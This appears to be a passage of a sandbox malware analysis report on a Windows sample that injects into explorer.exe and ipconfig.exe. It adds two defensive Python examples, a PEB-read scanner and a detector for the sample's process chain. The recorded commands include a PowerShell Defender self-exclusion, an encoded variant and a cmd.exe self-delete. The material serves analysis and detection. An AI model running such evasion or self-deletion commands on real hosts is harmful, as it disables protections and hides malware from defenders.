            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A1CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A0EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A04A35 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A1CA38 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A6CA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_019F0A5B mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A8EA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A1CA6F mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_019E6A50 mov eax, dword ptr fs:[00000030h] (x7)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A5CA72 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A16DA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01AA8DAE mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01AB4DAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A1CDB1 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A1CDB1 mov eax, dword ptr fs:[00000030h] (x2)
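            What a practitioner wants from the records above is a way to find the same fs:[30h] reads in a dump they are holding and to tell a debugger check from an API-resolution walk. The following is an added example, not code from the report or from the sample: a Python scanner that locates the two x86 encodings of a PEB-pointer load, names the register (matching the report's mov eax/ebx/ecx/edx/esi forms) and, as a heuristic, labels the PEB field the next instruction dereferences (BeingDebugged at +0x02, Ldr at +0x0C, NtGlobalFlag at +0x68). The sample bytes, the base address 0x019F0000 and the classification labels are constructed for the demonstration; the scan is byte-oriented rather than a disassembly, so hits are leads to confirm in a disassembler.

```python
# Scanner for 32-bit PEB-pointer loads (mov r32, dword ptr fs:[30h]) in raw code bytes.
# Added example; the sample bytes below are constructed, not taken from the report.

# ModRM byte for "mov r32, [disp32]" (mod=00, rm=101) keyed to the destination register.
_REG_BY_MODRM = {0x05: "eax", 0x0D: "ecx", 0x15: "edx", 0x1D: "ebx",
                 0x25: "esp", 0x2D: "ebp", 0x35: "esi", 0x3D: "edi"}
_REG_NUM = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3, "esp": 4, "ebp": 5, "esi": 6, "edi": 7}
# PEB fields commonly read right after the pointer load (32-bit PEB offsets).
_PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr (module list walk)", 0x68: "NtGlobalFlag"}
_DISP32_PEB = b"\x30\x00\x00\x00"


def _classify_follow_up(tail: bytes, reg: str) -> str:
    """Heuristic: find the next instruction that dereferences `reg` with a one-byte
    displacement (ModRM mod=01) and name the PEB field it touches; 'unknown' otherwise.
    Opcodes checked: mov r32 (8B), mov r8 (8A), cmp/test byte (80, F6), movzx (0F B6).
    esp as base would need a SIB byte and is deliberately not handled."""
    rm = _REG_NUM[reg]
    if rm == 4:
        return "unknown"
    for j in range(min(len(tail), 6)):
        op = tail[j]
        if op in (0x8B, 0x8A, 0x80, 0xF6) and j + 2 < len(tail):
            modrm, disp = tail[j + 1], tail[j + 2]
        elif op == 0x0F and j + 3 < len(tail) and tail[j + 1] == 0xB6:
            modrm, disp = tail[j + 2], tail[j + 3]
        else:
            continue
        if (modrm >> 6) == 0b01 and (modrm & 0b111) == rm and disp in _PEB_FIELDS:
            return _PEB_FIELDS[disp]
    return "unknown"


def find_peb_reads(code: bytes, base: int = 0):
    """Return [(address, register, classification)] for every fs:[30h] load in `code`.

    Recognised encodings:
      64 A1 30 00 00 00       mov eax, dword ptr fs:[30h]   (moffs32 short form)
      64 8B /r 30 00 00 00    mov r32, dword ptr fs:[30h]   (ModRM form, any register)
    `base` is only added to the offsets so output looks like the report's addresses.
    """
    hits = []
    i, n = 0, len(code)
    while i < n:
        if code[i] != 0x64:                     # FS segment-override prefix
            i += 1
            continue
        reg, length = None, 0
        if i + 6 <= n and code[i + 1] == 0xA1 and code[i + 2:i + 6] == _DISP32_PEB:
            reg, length = "eax", 6
        elif (i + 7 <= n and code[i + 1] == 0x8B and code[i + 2] in _REG_BY_MODRM
              and code[i + 3:i + 7] == _DISP32_PEB):
            reg, length = _REG_BY_MODRM[code[i + 2]], 7
        if reg is None:
            i += 1
            continue
        hits.append((base + i, reg, _classify_follow_up(code[i + length:i + length + 8], reg)))
        i += length
    return hits


def format_hit(hit) -> str:
    """Render a hit in the report's own notation, plus the heuristic label."""
    addr, reg, what = hit
    return f"{addr:08X} mov {reg}, dword ptr fs:[00000030h]  ; {what}"


# Constructed sample: three PEB reads followed by typical anti-debug / API-resolution reads.
SAMPLE = bytes.fromhex(
    "64A130000000" "0FB64002" "85C0" "90"        # mov eax,fs:[30h]; movzx eax,byte [eax+2]; test eax,eax
    "648B1D30000000" "8B4368" "F6C370" "90"      # mov ebx,fs:[30h]; mov eax,[ebx+68h]; test bl,70h
    "648B3530000000" "8B760C"                    # mov esi,fs:[30h]; mov esi,[esi+0Ch]
)

if __name__ == "__main__":
    for h in find_peb_reads(SAMPLE, base=0x019F0000):
        print(format_hit(h))
```

            Run against a dumped code section (for instance the 0x019D0000 region the report's 4_2_ addresses fall in) the output lines take the same shape as the records above, with the PEB field label appended; the esp form is reported but left unclassified because its follow-up instruction needs a SIB byte the heuristic does not decode.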
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_00F639FE FormatMessageW,ConvertLengthToIpv4Mask,InetNtopW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,LocalFree,LocalAlloc,GetAdaptersAddresses,LocalFree
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_00F653F0 SetUnhandledExceptionFilter
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_00F651A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\explorer.exe | Network Connect: 85.13.166.18 80
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe"
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | NtQueueApcThread: Indirect: 0x196A4F2
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | NtClose: Indirect: 0x196A56C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | NtClose: Indirect: 0x389A56C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | NtQueueApcThread: Indirect: 0x389A4F2
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: NULL | target: C:\Windows\explorer.exe | protection: execute and read and write (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section loaded: NULL | target: C:\Windows\SysWOW64\ipconfig.exe | protection: execute and read and write (x2)
            Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: NULL | target: C:\Windows\explorer.exe | protection: read write
            Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: NULL | target: C:\Windows\explorer.exe | protection: execute and read and write
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Thread register set: target process: 4084 (x2)
            Source: C:\Windows\SysWOW64\ipconfig.exe | Thread register set: target process: 4084
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Thread APC queued: target process: C:\Windows\explorer.exe
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Section unmapped: C:\Windows\SysWOW64\ipconfig.exe | base address: F60000
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe"
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Process created: C:\Users\user\Desktop\JHnNxt6Pnb.exe "C:\Users\user\Desktop\JHnNxt6Pnb.exe"
            Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\JHnNxt6Pnb.exe"
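            The process chain recorded above (a user-path executable launching PowerShell to exclude itself from Defender, respawning its own image, and a hollowed ipconfig.exe deleting the original file through cmd.exe) can be caught from process-creation telemetry alone; the section mapping, thread-context and APC steps into explorer.exe need injection telemetry and are not covered here. The following is an added example, not part of the Joe Sandbox report: a Python detector run over constructed Sysmon-style process-creation events modelled on these records. The events, the field names (ParentImage, Image, CommandLine), the rule names, the severity labels and the allowlist of parents permitted to delete executables are assumptions for the demonstration. The -EncodedCommand event goes beyond what this sample did and is included because the Sigma hit listed for this report targets the base64-encoded form of the cmdlet.

```python
# Process-creation detector for the Defender-exclusion / self-delete chain seen in this report.
# Added example; the events below are constructed, Sysmon Event ID 1 style, not real telemetry.
import base64
import re
from pathlib import PureWindowsPath

# Common spellings of PowerShell's -EncodedCommand switch followed by a base64 argument.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
MPPREF = re.compile(r"(?i)\bAdd-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\s+['\"]?([^'\"]+)")
DEL_CMD = re.compile(r"(?i)\bdel\b\s+(?:/[a-z]\s+)*['\"]?([^'\"]+?\.exe)")
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")
TRUSTED_DEL_PARENTS = {"explorer.exe", "cmd.exe", "msiexec.exe"}   # assumed allowlist


def expand_encoded(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so the rules see it."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def analyze(ev: dict) -> list:
    """Return [(rule, severity)] findings for one process-creation event."""
    findings = []
    parent, image = PureWindowsPath(ev["ParentImage"]), PureWindowsPath(ev["Image"])
    parent_l = str(parent).lower()
    parent_user_writable = any(t in parent_l for t in USER_WRITABLE)
    cmd = expand_encoded(ev["CommandLine"])

    m = MPPREF.search(cmd)
    if m:
        excluded = m.group(1).strip().lower()
        if excluded == parent_l:                       # the launching binary excludes itself
            findings.append(("defender_self_exclusion", "critical"))
        elif parent_user_writable:
            findings.append(("defender_exclusion_from_user_path", "high"))
        else:
            findings.append(("defender_exclusion_changed", "medium"))
        if not MPPREF.search(ev["CommandLine"]):       # cmdlet only visible after decoding
            findings.append(("encoded_mppreference", "high"))

    d = DEL_CMD.search(cmd) if image.name.lower() == "cmd.exe" else None
    if d and parent.name.lower() not in TRUSTED_DEL_PARENTS \
            and any(t in d.group(1).lower() for t in USER_WRITABLE):
        findings.append(("self_delete_via_cmd", "high"))

    if str(image).lower() == parent_l and parent_user_writable:
        findings.append(("self_respawn_from_user_path", "medium"))
    return findings


# Constructed events modelled on the "Process created" records of this report.
EVENTS = [
    {"ParentImage": r"C:\Users\user\Desktop\JHnNxt6Pnb.exe",
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe"'},
    {"ParentImage": r"C:\Users\user\Desktop\JHnNxt6Pnb.exe",
     "Image": r"C:\Users\user\Desktop\JHnNxt6Pnb.exe",
     "CommandLine": r'"C:\Users\user\Desktop\JHnNxt6Pnb.exe"'},
    {"ParentImage": r"C:\Windows\SysWOW64\ipconfig.exe",
     "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'/c del "C:\Users\user\Desktop\JHnNxt6Pnb.exe"'},
    # Constructed variant not seen in this sample: the same cmdlet behind -enc.
    {"ParentImage": r"C:\Users\user\Desktop\JHnNxt6Pnb.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + base64.b64encode(
         r"Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'".encode("utf-16le")).decode()},
    # Benign contrast: reading, not changing, Defender preferences from explorer.exe.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-MpPreference"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(PureWindowsPath(ev["Image"]).name, "<-", PureWindowsPath(ev["ParentImage"]).name, analyze(ev))
```

            The self-exclusion rule is the one worth paging on: a legitimate administrator excludes a directory or a product, not the exact binary that spawned the PowerShell process. The self-delete rule keys on the parent, since ipconfig.exe has no reason to spawn cmd.exe at all; on a real host the allowlist of parents permitted to delete executables from user-writable paths must be tuned to installers and updaters seen in the environment.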
            Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 9_2_00F64ACA AllocateAndInitializeSid,CheckTokenMembership,FreeSid
            Source: explorer.exe, 00000006.00000002.4002815172.00000000044D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1543667021.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4000726033.0000000001090000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000006.00000002.4000242416.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1543269548.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1543667021.0000000001091000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: explorer.exe, 00000006.00000000.1543667021.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4000726033.0000000001090000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: 0Program Manager
            Source: explorer.exe, 00000006.00000000.1543667021.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4000726033.0000000001090000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: explorer.exe, 00000006.00000003.3076284044.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005528609.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657201257.000000000936E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd]1Q
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Queries volume information: C:\Users\user\Desktop\JHnNxt6Pnb.exe VolumeInformation
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (x2)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00F626AE GetSystemTimeAsFileTime,9_2_00F626AE
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.JHnNxt6Pnb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.JHnNxt6Pnb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix, listed per tactic (the numeric prefixes are the counts as rendered in the report; entries without one carry no count there):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 1 Shared Modules; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 512 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 1 Rootkit; 1 Masquerading; 11 Disable or Modify Tools; 141 Virtualization/Sandbox Evasion; 512 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: 1 Credential API Hooking; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 1 System Time Discovery; 231 Security Software Discovery; 2 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 1 File and Directory Discovery; 213 System Information Discovery; Network Sniffing; Network Service Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 1 Credential API Hooking; 1 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 1 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement

            Legend:

            • Process
            • Signature
            • Created File
